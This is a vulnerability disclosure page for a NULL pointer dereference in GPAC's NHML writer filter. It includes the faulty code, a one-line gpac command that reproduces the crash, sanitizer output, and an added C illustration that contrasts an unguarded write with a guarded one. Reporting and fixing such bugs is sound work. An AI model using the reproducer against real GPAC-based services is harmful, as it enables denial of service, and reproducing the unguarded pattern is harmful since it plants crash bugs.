Submit #850391: gpac v26.02.0 NULL Pointer Dereference

Title: gpac v26.02.0 NULL Pointer Dereference
Description:

**Disclosure:** This report was drafted with AI assistance and manually reviewed/verified before submission.

Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!

- [x] I looked for a similar issue and couldn't find any.
- [x] I tried with the latest version of GPAC. Installers available at https://gpac.io/downloads/gpac-nightly-builds/
- [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95

## Summary

A null pointer dereference vulnerability exists in `src/filters/write_nhml.c` in the `nhmldump_send_frame()` function. The latest upstream build at commit `db3815307d1594fc34cb757d4509834a9d2e12bf` still triggers UBSan on the attached PoC/harness input.

## Vulnerability Details

**Validation Target:** Executable (`gpac` CLI)

**Location:** `src/filters/write_nhml.c:882`

**Vulnerable Code:**

```c
	} else if (ctx->is_stpp && ctx->nhmlonly) {
		sprintf(nhml, "<NHNTSubSample><![CDATA[\n");
		gf_bs_write_data(ctx->bs_w, nhml, (u32) strlen(nhml));
		gf_bs_write_data(ctx->bs_w, data, data_size);
		sprintf(nhml, "]]></NHNTSubSample>\n");
		gf_bs_write_data(ctx->bs_w, nhml, (u32) strlen(nhml));
	}

	if (ctx->filep) {
		// dump sample opening tag
```

The sanitizer-confirmed reproducer reaches `nhmldump_send_frame()` on the latest upstream build and reports the fault at or immediately under this location.

## Root Cause

The code assumes required state is present and dereferences a pointer that can remain NULL for malformed input or partially initialized objects. In the sanitizer output below, the NULL value is argument 2 of `gf_bs_write_data()`, i.e. the packet payload pointer `data` passed from line 882: the STPP/`nhmlonly` branch writes the payload without first checking that the packet carries any data.

## Steps to Reproduce

### 1. Prepare the attached PoC / harness artifacts

Use the following already-validated artifacts from the public validation repository as the attachment set for the issue:

- [run_stpp_null_packet.sh](https://github.com/Bin-infinite/vuln-validations/blob/main/gpac/latest/case-004/pocs/run_stpp_null_packet.sh)
- [poc-command.txt](https://github.com/Bin-infinite/vuln-validations/blob/main/gpac/latest/case-004/inputs/poc-command.txt)

### 2. Build or use a sanitizer-enabled latest GPAC

I reproduced this on latest upstream HEAD `db3815307d1594fc34cb757d4509834a9d2e12bf` with a Clang ASan/UBSan build under Linux. Run the following commands from this validation directory after setting `GPAC_BIN` to the sanitizer-built `gpac` executable and `GPAC_REPO` to the matching GPAC source/build tree.

### 3. Trigger the vulnerability

```bash
ASAN_OPTIONS=detect_leaks=0:abort_on_error=1:symbolize=1 UBSAN_OPTIONS=halt_on_error=1:print_stacktrace=1 \
LD_LIBRARY_PATH="$(dirname "$GPAC_BIN")" "$GPAC_BIN" \
  'fin:src=null:pck=10@0:ptime=1/1000:#CodecID=stpp:#StreamType=text' \
  'nhmlw:nhmlonly' -o stpp-null-packet.nhml
```

## Expected Result

GPAC should reject the malformed input or invalid state gracefully without hitting sanitizer diagnostics, leaking memory, or crashing.

## Actual Result

```
utils/bitstream.c:1184:56: runtime error: null pointer passed as argument 2, which is declared to never be null
    #0 0x7533424fb733 in gf_bs_write_data /tmp/gpac-latest-wt/src/utils/bitstream.c:1184:4
    #1 0x7533436f85ac in nhmldump_send_frame /tmp/gpac-latest-wt/src/filters/write_nhml.c:882:3
    #2 0x7533436f85ac in nhmldump_process /tmp/gpac-latest-wt/src/filters/write_nhml.c:1028:7
    #3 0x75334324f15a in gf_filter_process_task /tmp/gpac-latest-wt/src/filter_core/filter.c:3253:7
    #4 0x753343222344 in gf_fs_thread_proc /tmp/gpac-latest-wt/src/filter_core/filter_session.c:2418:3
    #5 0x75334321ff34 in gf_fs_run /tmp/gpac-latest-wt/src/filter_core/filter_session.c:2726:3

SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior utils/bitstream.c:1184:56
```

## Impact

- **Denial of Service**: malformed input can drive a null dereference and terminate the process
- **Attack Vector**: attackers can deliver crafted media files or graph descriptions that reach the affected code path

## Suggested Fix

Check all pointer-returning helpers and intermediate objects before dereference, and propagate a parse/validation error when required state is missing.

## Environment

- GPAC version: master branch / upstream HEAD `db3815307d1594fc34cb757d4509834a9d2e12bf`
- OS: Linux
- Compiler: Clang with ASan/UBSan (LSan enabled for leak cases)
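As an added illustration of the suggested fix (constructed for this page; it is neither GPAC's code nor the reporter's), a stand-in bitstream writer shows the pattern behind the report: the unguarded write mirrors line 882 of `write_nhml.c`, where a packet with no payload hands a NULL `data` pointer through to `memcpy()`, while the guarded variant validates the pointer first and lets the caller propagate a validation error. The `bs_t` type and all function names are assumptions made up for the example.

```c
#include <stddef.h>
#include <string.h>

/* Constructed stand-in for a GPAC-style bitstream writer (not gf_bs_write_data). */
typedef struct {
    unsigned char buf[256];
    size_t pos;
} bs_t;

/* Unguarded write, mirroring the reported failure: a NULL data pointer reaches
 * memcpy(), whose pointer parameters are declared non-null, so even a zero-length
 * write is undefined behaviour and is exactly what UBSan flags. */
int bs_write_unguarded(bs_t *bs, const unsigned char *data, size_t nbytes) {
    if (bs->pos + nbytes > sizeof bs->buf) return -1;
    memcpy(bs->buf + bs->pos, data, nbytes);   /* UB when data == NULL */
    bs->pos += nbytes;
    return 0;
}

/* Guarded write: an empty write is a no-op, a missing payload is an error. */
int bs_write_guarded(bs_t *bs, const unsigned char *data, size_t nbytes) {
    if (!bs) return -1;
    if (nbytes == 0) return 0;
    if (!data) return -1;
    if (bs->pos + nbytes > sizeof bs->buf) return -1;
    memcpy(bs->buf + bs->pos, data, nbytes);
    bs->pos += nbytes;
    return 0;
}

/* Models the NHNTSubSample CDATA emission from the report: tags are written only
 * when a payload exists; a NULL packet is rejected so the caller can propagate
 * a validation error instead of dereferencing it. */
int emit_subsample(bs_t *bs, const unsigned char *data, size_t nbytes) {
    static const char open_tag[] = "<NHNTSubSample><![CDATA[\n";
    static const char close_tag[] = "]]></NHNTSubSample>\n";
    if (!data) return -1;
    if (bs_write_guarded(bs, (const unsigned char *)open_tag, sizeof open_tag - 1)) return -1;
    if (bs_write_guarded(bs, data, nbytes)) return -1;
    return bs_write_guarded(bs, (const unsigned char *)close_tag, sizeof close_tag - 1);
}

/* Bytes emitted for one packet into a fresh buffer, or -1 if it was rejected. */
long subsample_bytes_written(const unsigned char *data, size_t nbytes) {
    bs_t bs = { {0}, 0 };
    if (emit_subsample(&bs, data, nbytes) != 0) return -1;
    return (long)bs.pos;
}
```

Running the guarded path under UBSan produces no diagnostic for a NULL packet, because `memcpy()` is never reached with a NULL argument; the unguarded function is included only to show the shape of the faulting call.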
Source: https://github.com/gpac/gpac/issues/3596
User: Kery Qi (UID 94424)
Submission: 06.06.2026 07:40 (30 days ago)
Moderation: 05.07.2026 18:07 (29 days later)
Status: Accepted
VulDB Entry: 376379 [GPAC 26.02.0 Media File src/filters/write_nhml.c nhmldump_send_frame Denial of Service]
Points: 20
